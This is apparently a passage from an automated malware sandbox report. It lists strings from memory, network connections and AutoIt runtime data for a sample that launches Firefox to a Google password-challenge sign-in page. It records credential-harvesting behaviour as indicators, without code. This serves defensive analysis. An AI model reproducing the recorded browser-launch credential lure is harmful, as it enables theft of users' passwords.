Source: file.exe, 00000000.00000003.2106642246.00000000061B9000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 00000009.00000003.2784973133.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2913432713.0000000005CD3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3069732243.0000025E8256F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3047335193.0000025E814E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: firefox.exe, 00000019.00000002.3047335193.0000025E814E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: file.exe, 00000000.00000003.2106642246.00000000061B9000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 00000009.00000003.2784973133.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2913432713.0000000005CD3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3069732243.0000025E8256F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3047335193.0000025E814E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: firefox.exe, 00000019.00000002.3013624425.0000025E7C851000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3001120503.0000016C701CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2997779943.000001CB31DC7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80C22000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: file.exe, 00000000.00000003.2106642246.00000000061B9000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 00000009.00000003.2784973133.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2913432713.0000000005CD3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3047335193.0000025E814E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: firefox.exe, 00000019.00000002.2996751406.000000851897C000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.orgo
Source: firefox.exe, 00000019.00000003.2953976180.0000025E8937F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2944106406.0000025E8976E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2936265181.0000025E8976E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.olx.pl/
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D2B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3023518743.0000025E7D203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.openh264.org/findUpdates()
Source: firefox.exe, 00000019.00000002.3040789860.0000025E80E47000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2936265181.0000025E8976E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.widevine.com/
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.widevine.com/set
Source: firefox.exe, 00000019.00000003.2944106406.0000025E8976E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2936265181.0000025E8976E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.wykop.pl/
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80C93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C6D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3023518743.0000025E7D225000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2997779943.000001CB31D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 00000019.00000003.2953976180.0000025E8937F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3023518743.0000025E7D2DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.zhihu.com/
Source: firefox.exe, 00000019.00000002.3053736608.0000025E81898000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3053736608.0000025E818A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com
Source: firefox.exe, 00000019.00000002.3053736608.0000025E81898000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C6D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2997654376.0000016C6FDAA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3006156086.0000016C702F4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2996884750.000001CB31AF0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2996884750.000001CB31AFA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2996213791.000001CB31AA4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000017.00000002.2853436931.000001537B509000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2860913339.0000024C02B4A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3008756386.0000025E70D89000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: firefox.exe, 00000019.00000002.3011428041.0000025E72C70000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3011428041.0000025E72CB2000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2997654376.0000016C6FDA0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3006156086.0000016C702F4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2996884750.000001CB31AF0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2996213791.000001CB31AA4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdMOZ_CRASHREPORTER_RE
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D279000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdUse
Source: firefox.exe, 00000019.00000002.3008756386.0000025E70D89000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdg;
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D2DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdmoz-extension://4f47
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50145 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50168 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50042 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50151 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown Network traffic detected: HTTP traffic on port 50116 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50055
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50179
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50057
Source: unknown Network traffic detected: HTTP traffic on port 50059 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50061
Source: unknown Network traffic detected: HTTP traffic on port 50071 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50154 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50063
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown Network traffic detected: HTTP traffic on port 50125 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50106
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50105
Source: unknown Network traffic detected: HTTP traffic on port 50039 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50107
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50060 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50109
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50065
Source: unknown Network traffic detected: HTTP traffic on port 50113 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50056 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50066
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50069
Source: unknown Network traffic detected: HTTP traffic on port 50077 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50074 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50070
Source: unknown Network traffic detected: HTTP traffic on port 50107 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50071
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50074
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50073
Source: unknown Network traffic detected: HTTP traffic on port 50080 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50088 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50117
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50116
Source: unknown Network traffic detected: HTTP traffic on port 50120 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50118
Source: unknown Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50147 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50076
Source: unknown Network traffic detected: HTTP traffic on port 50057 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50111
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50077
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50110
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50113
Source: unknown Network traffic detected: HTTP traffic on port 50076 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50115
Source: unknown Network traffic detected: HTTP traffic on port 50133 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50073 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50080
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50083
Source: unknown Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50084
Source: unknown Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50127 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50062 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50127
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50129
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50087
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50120
Source: unknown Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50086
Source: unknown Network traffic detected: HTTP traffic on port 50093 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50150 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50088
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50124
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown Network traffic detected: HTTP traffic on port 50111 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50126
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50125
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50090
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50093
Source: unknown Network traffic detected: HTTP traffic on port 50153 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50095
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 50065 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50105 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown Network traffic detected: HTTP traffic on port 50061 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50138
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50098
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50133
Source: unknown Network traffic detected: HTTP traffic on port 50055 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50090 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50158 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50106 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50129 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50087 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50169 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50144 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50117 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown Network traffic detected: HTTP traffic on port 50152 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50023
Source: unknown Network traffic detected: HTTP traffic on port 50070 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50144
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown Network traffic detected: HTTP traffic on port 50095 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50145
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50147
Source: unknown Network traffic detected: HTTP traffic on port 50098 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50151
Source: unknown Network traffic detected: HTTP traffic on port 50138 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50150
Source: unknown Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50084 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50086 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50039
Source: unknown Network traffic detected: HTTP traffic on port 50063 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50124 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50118 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50153
Source: unknown Network traffic detected: HTTP traffic on port 50019 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50152
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50154
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50158
Source: unknown Network traffic detected: HTTP traffic on port 50110 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50179 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown Network traffic detected: HTTP traffic on port 50066 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50083 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown Network traffic detected: HTTP traffic on port 50041 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50042
Source: unknown Network traffic detected: HTTP traffic on port 50115 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50168
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50169
Source: unknown Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50109 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50126 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50069 -> 443
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49986 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49991 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49992 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49993 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49997 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49998 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50000 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50002 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50003 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50004 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50013 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50015 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50020 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50025 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50031 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:50035 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50041 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50042 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50059 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:50063 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50066 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50074 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50073 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50077 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50083 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50084 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50086 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50088 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50090 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50093 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50095 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50111 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:50113 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50117 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50125 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50126 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:50144 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50145 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:50150 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50153 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50151 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50152 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:50154 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50168 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50169 version: TLS 1.2

System Summary

barindex
Source: 036e90e395.exe, 0000000B.00000002.2882888364.0000000000572000.00000002.00000001.01000000.0000000F.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_9de8f4b9-1
Source: 036e90e395.exe, 0000000B.00000002.2882888364.0000000000572000.00000002.00000001.01000000.0000000F.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_606c29ca-8
